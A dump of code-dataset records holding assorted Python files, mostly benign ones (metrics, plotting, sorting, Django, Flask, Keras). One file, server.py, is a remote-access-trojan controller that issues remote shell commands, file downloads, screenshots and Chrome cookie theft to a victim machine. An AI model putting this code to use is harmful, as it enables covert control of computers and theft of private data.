Dataset schema (column, dtype, value statistics):

| column | dtype | statistics |
|---|---|---|
| blob_id | string | lengths 40–40 |
| directory_id | string | lengths 40–40 |
| path | string | lengths 2–616 |
| content_id | string | lengths 40–40 |
| detected_licenses | list | lengths 0–69 |
| license_type | string | 2 classes |
| repo_name | string | lengths 5–118 |
| snapshot_id | string | lengths 40–40 |
| revision_id | string | lengths 40–40 |
| branch_name | string | lengths 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M, nullable |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | lengths 2–10.3M |
| authors | list | lengths 1–1 |
| author_id | string | lengths 0–212 |
9e19db1fcad86f999dc98e1740528e846c3db383
|
75fb9959d2e0ca078e282e95edff47c6ea5fd603
|
/util/eval.py
|
bb60c133a5356d0ef3511652798c9fd3540e2c9d
|
[
"MIT"
] |
permissive
|
kmader/tangent_conv
|
7232d3ac9e2ac091e50a22b143ee559047bd8b5b
|
1cada36e9fe28e3d844fc2c974cff9565835d04e
|
refs/heads/master
| 2020-03-21T03:18:14.428221
| 2018-06-18T09:47:37
| 2018-06-18T09:47:37
| 138,046,849
| 1
| 0
| null | 2018-06-20T14:49:53
| 2018-06-20T14:49:52
| null |
UTF-8
|
Python
| false
| false
| 2,891
|
py
|
import numpy as np
import tensorflow as tf
import sys
import os
import random
from path_config import *
from cloud import *
from dataset_params import *
class param:
def __init__(self, config):
self.experiment_dir = os.path.join(get_tc_path(), config['co_experiment_dir'])
self.output_dir = os.path.join(self.experiment_dir, config['co_output_dir'])
self.test_file = os.path.join(get_tc_path(), config['co_test_file'])
self.dataset_dir = os.path.join(get_tc_path(), config['pre_dataset_dir'])
self.label_file = config["eval_label_file"]
self.output_file = config["eval_output_file"]
dataset_type = config['pre_dataset_param']
if dataset_type == "stanford":
self.d_par = stanford_params()
elif dataset_type == "scannet":
self.d_par = scannet_params()
elif dataset_type == "semantic3d":
self.d_par = semantic3d_params()
def build_conf_matrix(gt_list, pr_list):
cnt = 0
global conf_mat, classes
for gt_l in gt_list:
if gt_l > 0:
pr_l = pr_list[cnt]
conf_mat[gt_l-1, pr_l-1] += 1
cnt += 1
def get_iou():
out = []
avg = 0.0
global conf_mat, classes
for cl in classes:
nom = conf_mat[cl-1, cl-1]
denom = sum(conf_mat[cl-1, :]) + sum(conf_mat[:, cl-1]) - conf_mat[cl-1, cl-1]
if denom > 0:
out.append(nom / denom)
else:
out.append(0.0)
avg += out[cl-1]
print(out)
print("mIoU: " + str(avg / len(classes)))
return out
def get_o_acc():
s_corr = 0.0
global conf_mat, classes
for i in range(0, len(classes)):
s_corr += conf_mat[i, i]
oa = s_corr / np.sum(conf_mat)
print("oA: " + str(oa))
return oa
def get_acc():
out = []
avg = 0.0
global conf_mat, classes
for cl in classes:
nom = conf_mat[cl-1, cl-1]
denom = sum(conf_mat[cl-1, :])
if denom > 0:
out.append(nom / denom)
else:
out.append(0.0)
avg += out[cl-1]
print(out)
print("mA: " + str(avg / len(classes)))
return out
def run_eval(config):
p = param(config)
global conf_mat, classes
conf_mat = np.zeros((p.d_par.num_classes, p.d_par.num_classes))
classes = list(range(1, p.d_par.num_classes))
# exclude class 'stairs' from evaluation for S3DIS
if isinstance(p.d_par, stanford_params):
classes = classes[:-1]
with open(p.test_file) as f:
scans = f.readlines()
scans = [s.rstrip() for s in scans]
counter = 0
avg_iou = []
cnt_iou = []
avg_acc = []
cnt_acc = []
for i in range(0, len(classes)):
avg_iou.append(0.0)
cnt_iou.append(0)
avg_acc.append(0.0)
cnt_acc.append(0)
cnt = 0
for scan_name in scans:
print(scan_name)
full_scan_path = os.path.join(p.dataset_dir, scan_name)
ref_labels = read_txt_labels(os.path.join(full_scan_path, p.label_file))
pr_scan_path = os.path.join(p.output_dir, scan_name, p.output_file)
pr_labels = read_txt_labels(pr_scan_path)
counter += 1
build_conf_matrix(ref_labels, pr_labels)
cnt += 1
get_iou()
get_acc()
get_o_acc()
return 0
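A minimal sketch of how the metric helpers above are driven, using a tiny synthetic two-class case instead of real scan files. The label lists are illustrative and not part of the original file; labels are 1-based and label 0 is skipped as unlabelled, matching build_conf_matrix.
# Hypothetical smoke test, run after the definitions above (not part of the original file).
conf_mat = np.zeros((2, 2))
classes = [1, 2]
build_conf_matrix(gt_list=[1, 1, 2, 2, 0], pr_list=[1, 2, 2, 2, 1])
get_iou()    # prints per-class IoU and mIoU
get_acc()    # prints per-class accuracy and mA
get_o_acc()  # prints overall accuracy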
|
[
"m.tatarchenko@yahoo.com"
] |
m.tatarchenko@yahoo.com
|
42799e013b0f0ec0efd95d90f6b63df67014862b
|
75fa4866ab30b9f556d30ca5b3895874b0ad5084
|
/visualize.py
|
05aa06265acbbb76dc30f53dd1bdb349ed8bea1e
|
[] |
no_license
|
maozhiqiang/tacotron2-1
|
ab03850c9598bb0fba9bed44419469b94d550a83
|
3adf39a3e9b3df6e01e28c4f5f2166c6e6d59e7d
|
refs/heads/master
| 2020-04-06T07:09:14.296113
| 2018-03-02T00:59:32
| 2018-03-02T00:59:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 875
|
py
|
import matplotlib.pyplot as plt
import io
import numpy as np
from PIL import Image
def show_spectrogram(spec, text=None, return_array=False):
plt.figure(figsize=(14, 6))
plt.imshow(spec)
plt.title(text, fontsize='10')
plt.colorbar(shrink=0.5, orientation='horizontal')
plt.ylabel('mels')
plt.xlabel('frames')
if return_array:
plt.tight_layout()
buff = io.BytesIO()
plt.savefig(buff, format='png')
buff.seek(0)
return np.array(Image.open(buff))
def show_attention(attention, return_array=False):
plt.figure(figsize=(14, 6))
plt.imshow(attention)
plt.ylabel('text sequence')
plt.xlabel('spectrogram frame')
if return_array:
plt.tight_layout()
buff = io.BytesIO()
plt.savefig(buff, format='png')
buff.seek(0)
return np.array(Image.open(buff))
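A minimal usage sketch for the two helpers above with synthetic data; the array shape is an illustrative assumption, not something the original file prescribes.
# Hypothetical example, run after the definitions above.
spec = np.random.rand(80, 200)  # mels x frames
img = show_spectrogram(spec, text="synthetic example", return_array=True)
print(img.shape)                # the rendered figure as an image array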
|
[
"jacobsonaustinj@gmail.com"
] |
jacobsonaustinj@gmail.com
|
e7d1c23b744493431d3d557a7c723432651f0fb3
|
f58a1dcae97115b566409704dcf1a46a5f86df47
|
/Bellevue University/Courses/DSC640/Week11and12/Python-master/Sorting Algorithms/merge_sort.py
|
f512f17c999cf7258922f6e19a58d34e5ac44f97
|
[
"MIT"
] |
permissive
|
safarie1103/Safarie1103
|
318519ace23c33fcf6d36337392156e5381abd49
|
a86172bfc47eff0af65285b641af0ad26e13fd12
|
refs/heads/master
| 2023-06-13T01:43:35.761325
| 2023-06-07T16:01:16
| 2023-06-07T16:01:16
| 205,732,823
| 0
| 1
| null | 2022-11-28T15:55:13
| 2019-09-01T21:11:38
| null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
#---------------------------------------
# Merge Sort
#---------------------------------------
import sys
def merge_sort(A):
merge_sort2(A, 0, len(A)-1)
def merge_sort2(A, first, last):
if first < last:
middle = (first + last)//2
merge_sort2(A, first, middle)
merge_sort2(A, middle+1, last)
merge(A, first, middle, last)
def merge(A, first, middle, last):
    L = A[first:middle+1]
    R = A[middle+1:last+1]
    # sentinels: the merge loop below never runs past the end of either half
    L.append(sys.maxsize)
    R.append(sys.maxsize)
    i = j = 0
    for k in range(first, last+1):
        if L[i] <= R[j]:
            A[k] = L[i]
            i += 1
        else:
            A[k] = R[j]
            j += 1
A = [5,9,1,2,4,8,6,3,7]
print(A)
merge_sort(A)
print(A)
|
[
"54446804+safarie1103@users.noreply.github.com"
] |
54446804+safarie1103@users.noreply.github.com
|
c378cf4373aa8e0cab042bfc688fec3fb09c4997
|
4427fc578551546d26fd8b01610d67467073e24d
|
/server.py
|
adcefe8ed33955c27acbf3a87a71be1cd7d3ff6a
|
[] |
no_license
|
dimagamera/RAT
|
d07589273e4ff56efbaff88b9787028e07523191
|
dd55616b32e7e538725b5e76e13fea9b2469da80
|
refs/heads/master
| 2023-06-08T06:41:32.424058
| 2021-06-27T17:08:48
| 2021-06-27T17:08:48
| 359,813,612
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,738
|
py
|
import socket, sys
import os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '0.0.0.0'
port = 81
s.bind((host, port))
s.listen(1)
while True:
conn, addr = s.accept()
a = input('/cmd - Сommand line\n/mkdir - Make directory\n/reboot - Restart System\n/sysinfo - system information\n/dir - (Files, Download)\n/screen - ScreenShot\n/cks - cookies & MediaHistory(Google Chrome)\n> ')
conn.send(a.encode())
if a == '/cmd':
cmd = input('#> ')
conn.send(cmd.encode())
cmd_process = conn.recv(5000)
cmd_process = str(cmd_process, "cp866")
print(cmd_process)
elif a == '/mkdir':
dir = input('Name directory > ')
conn.send(dir.encode())
elif a == "/dir":
cmd = input('1. Файли 2. Скачати > ')
if cmd == '1':
conn.send(cmd.encode())
direct = input('1. Наявня папка 2. Перейти >')
if direct == '1':
conn.send(direct.encode())
f = open('file.txt', 'wb')
while True:
try:
data = conn.recv(1024)
if data == 'EOF'.encode():
break
f.write(data)
f.close()
except:
break
f = open('file.txt', 'r')
print(f.read())
f.close()
os.remove('file.txt')
elif direct == '2':
conn.send(direct.encode())
f = open('pwd.txt', 'wb')
while True:
try:
data = conn.recv(1024)
if data == 'EOF'.encode():
break
f.write(data)
print(data)
f.close()
os.remove('pwd.txt')
except:
break
dir = input('Directory > ')
conn.send(dir.encode())
f = open('file.txt', 'wb')
while True:
try:
data = conn.recv(1024)
if data == 'EOF'.encode():
break
f.write(data)
f.close()
except:
break
f = open('file.txt', 'r')
print(f.read())
f.close()
os.remove('file.txt')
elif a == '/sysinfo':
sysinfo = conn.recv(5000)
sysinfo = str(sysinfo, 'cp866')
print(sysinfo)
|
[
"noreply@github.com"
] |
dimagamera.noreply@github.com
|
d55fa72397ebc28f58f7760e1b3888e299a03a7e
|
2abb4dd2c1f4a0a833a24c5fb98b2b627f29c881
|
/studypython/users/admin.py
|
32fddfc8e6d1a96ae7d6712f7ff452d63127b80a
|
[
"MIT"
] |
permissive
|
studyjss/studypython
|
9192800f3b639c296b095d40a20ec7520c818fed
|
15e78cd62e90103fa23b18fd9ebc7527bfa1bd77
|
refs/heads/master
| 2021-11-19T08:58:58.528005
| 2018-08-07T06:49:00
| 2018-08-07T06:49:00
| 143,522,072
| 0
| 0
|
MIT
| 2021-09-08T00:07:54
| 2018-08-04T11:10:53
|
Python
|
UTF-8
|
Python
| false
| false
| 544
|
py
|
from django.contrib import admin
from django.contrib.auth import admin as auth_admin
from django.contrib.auth import get_user_model
from studypython.users.forms import UserChangeForm, UserCreationForm
User = get_user_model()
@admin.register(User)
class UserAdmin(auth_admin.UserAdmin):
form = UserChangeForm
add_form = UserCreationForm
fieldsets = (("User", {"fields": ("name", "followers", "following",)}),) + auth_admin.UserAdmin.fieldsets
list_display = ["username", "name", "is_superuser"]
search_fields = ["name"]
|
[
"jss@JMac.local"
] |
jss@JMac.local
|
8c777fd5c8ceb69d6a6c012f89122bbb7cb31272
|
94f5bae62a2ed5bf5bd69995d9604c191b6333a0
|
/Projects/TestApp/src/newDB.py
|
6ec6b46e27a581ec54df6a7d940a33244349f284
|
[] |
no_license
|
sethc23/BD_Scripts
|
5eef664af935fb38ad28581faaedb51075338553
|
989d62b77ca70d239ae3cf99149c5215f6e6119e
|
refs/heads/master
| 2020-04-12T17:36:17.600971
| 2017-02-22T09:46:27
| 2017-02-22T09:46:27
| 30,630,547
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 915
|
py
|
from google.appengine.ext import db
class CLposts(db.Model):
site = db.ReferenceProperty(Sites)
category = db.ReferenceProperty(Categories)
class Locations(db.Model):
location = db.StringProperty()
category = db.ReferenceProperty(Categories)
class Categories(db.Model):
postDate = db.IntegerProperty()
title = db.StringProperty()
link = db.StringProperty()
postId = db.IntegerProperty()
created = db.DateTimeProperty(auto_now_add=True)
location = "boston"
category = "wanted"
postDate = 22809
title = "Double Jogger wanted -"
link = "testing"
postId = 1054309606
wanted = Categories(name=category, postDate=postDate,
title=title, link=link,
postId=postId)
wanted.put()
boston = Locations(location=location, category=wanted.key())
boston.put()
posts = CLposts(location=boston.key(), category=wanted.key())
posts.put()
|
[
"ub2@SERVER2.local"
] |
ub2@SERVER2.local
|
2db87b6470a083d191a9ed252fc04e10a13fa0b1
|
336bca6cebe635fb79a0097fe2b3d1883ae31665
|
/testReg.py
|
1611d0b809f40dadb2bfdf7bb962c494c6c8b40c
|
[] |
no_license
|
umamuma/PythonTest
|
4694dc55593586c85c4be7c8a7f283186456c18c
|
d0fc65878111684612e09a4fc82ed42cc140db69
|
refs/heads/master
| 2020-03-26T10:08:40.294844
| 2018-09-21T01:01:15
| 2018-09-21T01:01:15
| 144,783,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,398
|
py
|
from __future__ import absolute_import, division, print_function
import tensorflow as tf
from tensorflow import keras
import numpy as np
print(tf.__version__)
boston_housing = keras.datasets.boston_housing
(train_data, train_labels), (test_data, test_labels) = boston_housing.load_data()
# Shuffle the training set
order = np.argsort(np.random.random(train_labels.shape))
train_data = train_data[order]
train_labels = train_labels[order]
print("Training set: {}".format(train_data.shape)) # 404 examples, 13 features
print("Testing set: {}".format(test_data.shape)) # 102 examples, 13 features
print(train_data[0]) # Display sample features, notice the different scales
import pandas as pd
column_names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD',
'TAX', 'PTRATIO', 'B', 'LSTAT']
df = pd.DataFrame(train_data, columns=column_names)
df.head()
print(train_labels[0:10]) # Display first 10 entries
# Test data is *not* used when calculating the mean and std
mean = train_data.mean(axis=0)
std = train_data.std(axis=0)
train_data = (train_data - mean) / std
test_data = (test_data - mean) / std
print(train_data[0]) # First training sample, normalized
def build_model():
model = keras.Sequential([
keras.layers.Dense(64, activation=tf.nn.relu,
input_shape=(train_data.shape[1],)),
keras.layers.Dense(64, activation=tf.nn.relu),
keras.layers.Dense(1)
])
optimizer = tf.train.RMSPropOptimizer(0.001)
model.compile(loss='mse',
optimizer=optimizer,
metrics=['mae'])
return model
model = build_model()
model.summary()
# Display training progress by printing a single dot for each completed epoch
class PrintDot(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs):
if epoch % 100 == 0: print('')
print('.', end='')
EPOCHS = 500
# Store training stats
history = model.fit(train_data, train_labels, epochs=EPOCHS,
validation_split=0.2, verbose=0,
callbacks=[PrintDot()])
import matplotlib.pyplot as plt
def plot_history(history):
plt.figure()
plt.xlabel('Epoch')
plt.ylabel('Mean Abs Error [1000$]')
plt.plot(history.epoch, np.array(history.history['mean_absolute_error']),
label='Train Loss')
plt.plot(history.epoch, np.array(history.history['val_mean_absolute_error']),
label = 'Val loss')
plt.legend()
plt.ylim([0, 5])
plot_history(history)
model = build_model()
# The patience parameter is the amount of epochs to check for improvement
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=20)
history = model.fit(train_data, train_labels, epochs=EPOCHS,
validation_split=0.2, verbose=0,
callbacks=[early_stop, PrintDot()])
plot_history(history)
[loss, mae] = model.evaluate(test_data, test_labels, verbose=0)
print("Testing set Mean Abs Error: ${:7.2f}".format(mae * 1000))
test_predictions = model.predict(test_data).flatten()
plt.figure()
plt.scatter(test_labels, test_predictions)
plt.xlabel('True Values [1000$]')
plt.ylabel('Predictions [1000$]')
plt.axis('equal')
plt.xlim(plt.xlim())
plt.ylim(plt.ylim())
_ = plt.plot([-100, 100], [-100, 100])
error = test_predictions - test_labels
plt.figure()
plt.hist(error, bins = 50)
plt.xlabel("Prediction Error [1000$]")
_ = plt.ylabel("Count")
|
[
"TC24227@esl.corp.elbit.co.il"
] |
TC24227@esl.corp.elbit.co.il
|
1d108ec732fe66d7d450832a742f8215468e597e
|
3baca7237d5096cb3610a4668d79cae42c5d2477
|
/videos_id/video_info.py
|
fec5064c3c5f344369530534ad0586833ee99529
|
[] |
no_license
|
ittus/python-video-ids
|
fc1cad8100246ec2bed1ca88156d320ef15e6416
|
318b91a8b11f1dac7906505f94d93bc0974a9079
|
refs/heads/master
| 2021-07-25T11:51:41.121755
| 2021-06-17T09:34:19
| 2021-06-17T09:34:19
| 73,607,543
| 2
| 3
| null | 2021-07-18T05:50:12
| 2016-11-13T09:57:06
|
Python
|
UTF-8
|
Python
| false
| false
| 762
|
py
|
from videos_id.provider.dailymotion import Dailymotion
from videos_id.provider.vimeo import Vimeo
from videos_id.provider.youtube import Youtube
class VideoInfo(object):
def __init__(self):
dailymotion = Dailymotion()
youtube = Youtube()
vimeo = Vimeo()
self.platform_list = [dailymotion, youtube, vimeo]
self.platform = None
self.video_id = None
def check_video_id(self, url):
for platform in self.platform_list:
video_id = platform.check_url(url)
if video_id:
self.video_id = video_id
self.platform = platform.platform
return video_id
self.video_id = None
self.platform = None
return self.video_id
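A minimal usage sketch (the URL is illustrative; which URLs are recognised depends entirely on each provider's check_url implementation):
# Hypothetical example, run after the class definition above.
info = VideoInfo()
video_id = info.check_video_id("https://www.youtube.com/watch?v=dQw4w9WgXcQ")
if video_id:
    print(info.platform, video_id)  # provider name and extracted id
else:
    print("URL not recognised by any provider")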
|
[
"vuminhthang.cm@gmail.com"
] |
vuminhthang.cm@gmail.com
|
ae3738da2e11597c896ff29b5496d4050f3adf7c
|
6f904270a11bd6589a393c1e3713ff37348db0e5
|
/pset7/survey/application.py
|
2fc24fbcc2a769ad1e483481bacdbbec7671e0d7
|
[] |
no_license
|
akigler/cs50_projects
|
186008d33b45360bc098f4e07c6a338ed13e9bf2
|
be5d193bdf7e52e1fcd8b82115406a2994f57f24
|
refs/heads/master
| 2020-07-08T02:48:10.226342
| 2019-08-21T08:49:21
| 2019-08-21T08:49:21
| 203,543,925
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,344
|
py
|
import cs50
import csv
from flask import Flask, jsonify, redirect, render_template, request
# Configure application
app = Flask(__name__)
# Reload templates when they are changed
app.config["TEMPLATES_AUTO_RELOAD"] = True
@app.after_request
def after_request(response):
"""Disable caching"""
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
@app.route("/", methods=["GET"])
def get_index():
return redirect("/form")
@app.route("/form", methods=["GET"])
def get_form():
return render_template("form.html")
@app.route("/form", methods=["POST"])
def post_form():
if not request.form.get("name") or not request.form.get("house_dropdown") or not request.form.get("position"):
return render_template("error.html", message="TODO")
file = open("survey.csv", "a")
writer = csv.writer(file)
writer.writerow((request.form.get("name"), request.form.get("house_dropdown"), request.form.get("position")))
file.close()
return redirect("/sheet")
@app.route("/sheet", methods=["GET"])
def get_sheet():
with open("survey.csv", "r") as file:
reader = csv.reader(file)
students = list(reader)
return render_template("registered.html", students=students)
|
[
"jpbubar@gmail.com"
] |
jpbubar@gmail.com
|
4b33ddef5a15b9438476aff953c6a63ebf3d1a31
|
258920163b6ba24759cd21b8846f574f529274f7
|
/v3/measured_retrieval.py
|
ae49b5b5ab96cd5d980af5bb1e74f79e5f124edc
|
[] |
no_license
|
xiaochungong/attosecond_streaking_phase_retrieval
|
16186da18a463d578966acb385d1b3cf14713132
|
8a26a2393faef114ded3651b9bd4769ae648a267
|
refs/heads/master
| 2022-10-27T01:04:15.470201
| 2019-06-10T19:30:02
| 2019-06-10T19:30:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,433
|
py
|
import tensorflow as tf
import tf_functions
import numpy as np
import scipy.constants as sc
import tables
import shutil
import matplotlib.pyplot as plt
import os
import csv
from network3 import initialize_xuv_ir_trace_graphs, setup_neural_net, separate_xuv_ir_vec
import xuv_spectrum.spectrum
import ir_spectrum.ir_spectrum
def find_central_frequency_from_trace(trace, delay, energy, plotting=False):
# make sure delay is even
assert len(delay) % 2 == 0
# find central frequency
N = len(delay)
print('N: ', N)
dt = delay[-1] - delay[-2]
df = 1 / (dt * N)
freq_even = df * np.arange(-N / 2, N / 2)
# plot the streaking trace and ft
trace_f = np.fft.fftshift(np.fft.fft(np.fft.fftshift(trace, axes=1), axis=1), axes=1)
# summation along vertical axis
integrate = np.sum(np.abs(trace_f), axis=0)
# find the maximum values
f0 = find_f0(x=freq_even, y=integrate)
if plotting:
_, ax = plt.subplots(3, 1)
ax[0].pcolormesh(delay, energy, trace, cmap='jet')
ax[1].pcolormesh(freq_even, energy, np.abs(trace_f), cmap='jet')
ax[2].plot(freq_even, integrate)
return f0
def find_f0(x, y):
x = np.array(x)
y = np.array(y)
maxvals = []
for _ in range(3):
max_index = np.argmax(y)
maxvals.append(x[max_index])
x = np.delete(x, max_index)
y = np.delete(y, max_index)
maxvals = np.delete(maxvals, np.argmin(np.abs(maxvals)))
return maxvals[np.argmax(maxvals)]
def create_plot_axes():
fig = plt.figure()
fig.subplots_adjust(hspace=0.3, left=0.1, right=0.9, top=0.9, bottom=0.1)
gs = fig.add_gridspec(3, 3)
axes_dict = {}
axes_dict["input_trace"] = fig.add_subplot(gs[0,:])
axes_dict["predicted_xuv_t"] = fig.add_subplot(gs[1, 2])
axes_dict["predicted_xuv"] = fig.add_subplot(gs[1,1])
axes_dict["predicted_xuv_phase"] = axes_dict["predicted_xuv"].twinx()
axes_dict["predicted_ir"] = fig.add_subplot(gs[1,0])
axes_dict["predicted_ir_phase"] = axes_dict["predicted_ir"].twinx()
axes_dict["generated_trace"] = fig.add_subplot(gs[2,:])
return axes_dict
def plot_generated_trace(axes, generated_trace, xuv_coefs, ir_params, input_trace, tf_generator_graphs, sess, streak_params):
xuv_tmat = xuv_spectrum.spectrum.tmat * sc.physical_constants['atomic unit of time'][0]*1e18 # attosecond
xuv_fmat = xuv_spectrum.spectrum.fmat_cropped / sc.physical_constants['atomic unit of time'][0] # Hz
ir_fmat = ir_spectrum.ir_spectrum.fmat_cropped / sc.physical_constants['atomic unit of time'][0] # Hz
tau_values = (streak_params["tau_values"] * sc.physical_constants['atomic unit of time'][0])*1e15 # femtosecond
k_values = streak_params["k_values"] # a.u.
xuv_Ef = sess.run(tf_generator_graphs["xuv_E_prop"]["f_cropped"], feed_dict={tf_generator_graphs["xuv_coefs_in"]: xuv_coefs.reshape(1, -1)})
xuv_Et = sess.run(tf_generator_graphs["xuv_E_prop"]["t"], feed_dict={tf_generator_graphs["xuv_coefs_in"]: xuv_coefs.reshape(1, -1)})
ir_Ef = sess.run(tf_generator_graphs["ir_E_prop"]["f_cropped"],feed_dict={tf_generator_graphs["ir_values_in"]: ir_params.reshape(1, -1)})
axes["input_trace"].pcolormesh(tau_values,k_values,input_trace, cmap="jet")
axes["input_trace"].set_ylabel("atomic units Energy")
axes["input_trace"].set_xlabel("fs")
axes["input_trace"].set_title("input streaking trace")
axes["generated_trace"].pcolormesh(tau_values,k_values,generated_trace, cmap="jet")
axes["generated_trace"].set_xlabel("fs")
axes["generated_trace"].set_ylabel("atomic units Energy")
axes["generated_trace"].set_title("generated streaking trace")
trace_actual_reshape = generated_trace.reshape(-1)
trace_reconstructed_reshaped = input_trace.reshape(-1)
trace_rmse = np.sqrt((1 / len(trace_actual_reshape)) * np.sum(
(trace_reconstructed_reshaped - trace_actual_reshape) ** 2))
axes["generated_trace"].text(0.1, 0.1, "rmse: {}".format(trace_rmse),
transform=axes["generated_trace"].transAxes,
backgroundcolor="white")
axes["predicted_xuv_phase"].plot(xuv_fmat, np.unwrap(np.angle(xuv_Ef[0])), color='green')
axes["predicted_xuv"].plot(xuv_fmat, np.abs(xuv_Ef[0])**2, label="Intensity", color="black")
axes["predicted_xuv"].set_xlabel("Hz")
axes["predicted_xuv"].legend()
axes["predicted_xuv_t"].plot(xuv_tmat, np.real(xuv_Et[0]), color="blue", label="xuv E(t)")
axes["predicted_xuv_t"].set_xlabel("attoseconds")
axes["predicted_xuv_t"].legend()
axes["predicted_ir"].plot(ir_fmat, np.real(ir_Ef[0]), color="blue")
axes["predicted_ir"].plot(ir_fmat, np.imag(ir_Ef[0]), color="red")
axes["predicted_ir"].set_xlabel("Hz")
def get_measured_trace():
filepath = './measured_trace/sample2/MSheet1_1.csv'
with open(filepath) as csvfile:
reader = csv.reader(csvfile)
matrix = np.array(list(reader))
Energy = matrix[1:, 0].astype('float') # eV
Delay = matrix[0, 1:].astype('float') # fs
Values = matrix[1:, 1:].astype('float')
#print(Delay)
# print('len(Energy): ', len(Energy))
# print('Energy: ', Energy)
# construct frequency axis with even number for fourier transform
values_even = Values[:, :-1]
Delay_even = Delay[:-1]
Delay_even = Delay_even * 1e-15 # convert to seconds
Dtau = Delay_even[-1] - Delay_even[-2]
# print('Delay: ', Delay)
# print('Delay_even: ', Delay_even)
# print('np.shape(values_even): ', np.shape(values_even))
# print('len(values_even.reshape(-1))', len(values_even.reshape(-1)))
# print('Dtau: ', Dtau)
# print('Delay max', Delay_even[-1])
# print('N: ', len(Delay_even))
# print('Energy: ', len(Energy))
f0 = find_central_frequency_from_trace(trace=values_even, delay=Delay_even, energy=Energy)
# print(f0) # in seconds
lam0 = sc.c / f0
# print('f0 a.u.: ', f0 * sc.physical_constants['atomic unit of time'][0]) # convert f0 to atomic unit
# print('lam0: ', lam0)
# normalize values
#exit(0)
return Delay_even, Energy, values_even
if __name__ == "__main__":
tf_generator_graphs, streak_params, xuv_phase_coefs = initialize_xuv_ir_trace_graphs()
nn_nodes = setup_neural_net(streak_params, xuv_phase_coefs)
axes = create_plot_axes()
_, _, trace = get_measured_trace()
modelname = 'run3'
with tf.Session() as sess:
saver = tf.train.Saver()
saver.restore(sess, './models/{}.ckpt'.format(modelname))
predicted_fields = sess.run(nn_nodes["y_pred"], feed_dict={nn_nodes["x"]: trace.reshape(1, -1)})
xuv_coefs, ir_params = separate_xuv_ir_vec(predicted_fields[0])
generated_trace = sess.run(tf_generator_graphs["image"],
feed_dict={tf_generator_graphs["xuv_coefs_in"]: xuv_coefs.reshape(1, -1),
tf_generator_graphs["ir_values_in"]: ir_params.reshape(1, -1)})
print(np.shape(generated_trace))
plot_generated_trace(axes=axes, generated_trace=generated_trace, xuv_coefs=xuv_coefs,
ir_params=ir_params, input_trace=trace, tf_generator_graphs=tf_generator_graphs,
sess=sess, streak_params=streak_params)
plt.show()
|
[
"jonathonwhite5@gmail.com"
] |
jonathonwhite5@gmail.com
|
ebef311a1f74e61ac986ae1afbf6ba1b2e34de9d
|
eb3049039d7e5c9a9ccf2ee82a3371aa71768068
|
/messenger/chats/models.py
|
b5570151d6022b6b7403d3fcab2bb6b099b4d12e
|
[] |
no_license
|
ilpol/Django-and-PostgreSQL
|
1a98c3de068b575ee3f38e461fec6afb2a0b6c27
|
907519f5ceff18cc9a471ca1691ff65e832d29ea
|
refs/heads/main
| 2023-05-07T17:53:34.083617
| 2021-05-31T19:03:38
| 2021-05-31T19:03:38
| 372,237,690
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 285
|
py
|
import datetime
from django.db import models
from django.utils import timezone
class Chat(models.Model):
chat_name = models.CharField(max_length=200, default='')
users = models.CharField(max_length=200, default='')
messages = models.CharField(max_length=200, default='')
|
[
"IKPolozov@beeline.ru"
] |
IKPolozov@beeline.ru
|
ba5a0296deead2222078bce64a2de0a655661aef
|
0c305e2eff6582980c517d487fdfdea8ccfa2b80
|
/src/gta/gameInputs/__init__.py
|
30386d537a24667cd040c66356704e2fed5427d9
|
[] |
no_license
|
tsbertalan/gtaracer
|
5d4aeab9738adbb893eb5231aa19c3f1dda54791
|
12697fad980679f00d5dc86edd8cfa36b89f6408
|
refs/heads/master
| 2023-08-26T03:20:51.071951
| 2021-07-24T19:49:39
| 2021-07-24T19:49:39
| 108,666,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
# from gta.gameInputs.gamepad import JoystickEmulator
# class ControlInputs(object):
# def __init__(self):
# self.gamepadEmulator = JoystickEmulator()
# self.oldAxes = [0] * 6
# def applyControlState(self, controlVector):
# axes = controlVector[:6]
# keys = 'lx', 'ly', 'lt', 'rx', 'ry', 'rt'
# for old, new, key in zip(self.oldAxes, axes, keys):
# if old != new:
# self.gamepadEmulator.axes[key].setValue(new)
# self.gamepadEmulator.update()
# self.oldAxes = axes
# lx, ly, lt, rx, ry, rt = axes
|
[
"tom@tombertalan.com"
] |
tom@tombertalan.com
|
cdfc0f3dfbf35d333d77f8ba70d727f58fc3026d
|
338062cc2bb422f1364fd18ad5e721f6f713907a
|
/22. Функции. Возвращение значений из функций/Классная работа/Число словами.py
|
152a4277e11ca65c960203fbb12d6f156ba6f9c5
|
[] |
no_license
|
rady1337/FirstYandexLyceumCourse
|
f3421d5eac7e7fbea4f5e266ebeb6479b89941cf
|
0d27e452eda046ddd487d6471eeb7d9eb475bd39
|
refs/heads/master
| 2022-06-17T03:07:51.017888
| 2020-05-12T22:17:34
| 2020-05-12T22:17:34
| 263,459,364
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
def number_to_words(n):
    f = {1: 'один', 2: 'два', 3: 'три', 4: 'четыре', 5: 'пять', 6: 'шесть', 7: 'семь', 8: 'восемь', 9: 'девять'}
